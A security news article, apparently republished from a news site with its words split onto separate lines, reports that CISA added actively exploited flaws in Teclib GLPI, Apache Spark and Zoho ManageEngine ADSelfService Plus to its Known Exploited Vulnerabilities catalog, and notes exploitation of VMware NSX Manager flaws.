CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

1 year ago AndyC

Mar
08,
2023Ravie
LakshmananVulnerability
/
Cybersecurity

The
U.S.

Mar
08,
2023Ravie
LakshmananVulnerability
/
Cybersecurity

CISA's KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

The
U.S.
Cybersecurity
and
Infrastructure
Security
Agency
(CISA)
has

added
three
security
flaws
to
its
Known
Exploited
Vulnerabilities
(KEV)
catalog,
citing
evidence
of
active
exploitation.

The
list
of
vulnerabilities
is
below
–

CVE-2022-35914
(CVSS
score:
9.8)
–
Teclib
GLPI
Remote
Code
Execution
Vulnerability
CVE-2022-33891
(CVSS
score:
8.8)
–
Apache
Spark
Command
Injection
Vulnerability
CVE-2022-28810
(CVSS
score:
6.8)
–
Zoho
ManageEngine
ADSelfService
Plus
Remote
Code
Execution
Vulnerability

The
most
critical
of
the
three
is

CVE-2022-35914,
which
concerns
a
remote
code
execution
vulnerability
in
the
third-party
library
htmlawed
present
in

Teclib
GLPI,
an
open
source
asset
and
IT
management
software
package.

The
exact
specifics
surrounding
the
nature
of
attacks
are
unknown,
but
the
Shadowserver
Foundation
in
October
2022

noted
that
it’s
seeing
exploitation
attempts
against
its
honeypots.

Since
then,
a
cURL-based
one-line
proof
of
concept
(PoC)
has
been
made
available
on
GitHub
and
a
“mass”
scanner
has
been
advertised
for
sale,
VulnCheck
security
researcher
Jacob
Baines

said
in
December
2022.

Furthermore,
data
gathered
by
GreyNoise
has

revealed
40
malicious
IP
addresses
from
the
U.S.,
the
Netherlands,
Hong
Kong,
Australia,
and
Bulgaria,
attempting
to
abuse
the
shortcoming.

The
second
flaw
is
an
unauthenticated
command
injection
vulnerability
in
Apache
Spark
that
has
been
exploited
by
the

Zerobot
botnet
to
co-opt
susceptible
devices
with
the
goal
of
carrying
out
distributed
denial-of-service
(DDoS)
attacks.

Lastly,
also
added
to
the
KEV
catalog
is
a

remote
code
execution
flaw
in
Zoho
ManageEngine
ADSelfService
Plus
that
was
patched
in
April
2022.

Discover
the
Latest
Malware
Evasion
Tactics
and
Prevention
Strategies

Ready
to
bust
the
9
most
dangerous
myths
about
file-based
attacks?
Join
our
upcoming
webinar
and
become
a
hero
in
the
fight
against
patient
zero
infections
and
zero-day
security
events!

RESERVE
YOUR
SEAT

“Multiple
Zoho
ManageEngine
ADSelfService
Plus
contains
an
unspecified
vulnerability
allowing
for
remote
code
execution
when
performing
a
password
change
or
reset,”
CISA
said.

Cybersecurity
company
Rapid7,
which

discovered
the
bug,
said
it
detected
active
exploitation
attempts
by
threat
actors
to
“execute
arbitrary
OS
commands
in
order
to
gain
persistence
on
the
underlying
system
and
attempt
to
pivot
further
into
the
environment.”

The
development
comes
as
API
security
firm
Wallarm

said
it
has
found
ongoing
exploit
attempts
of
two
VMware
NSX
Manager
flaws
(CVE-2021-39144
and

CVE-2022-31678)
since
December
2022
that
could
be
leveraged
to
execute
malicious
code,
and
siphon
sensitive
data.

Found
this
article
interesting?
Follow
us
on

Twitter


and

LinkedIn
to
read
more
exclusive
content
we
post.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts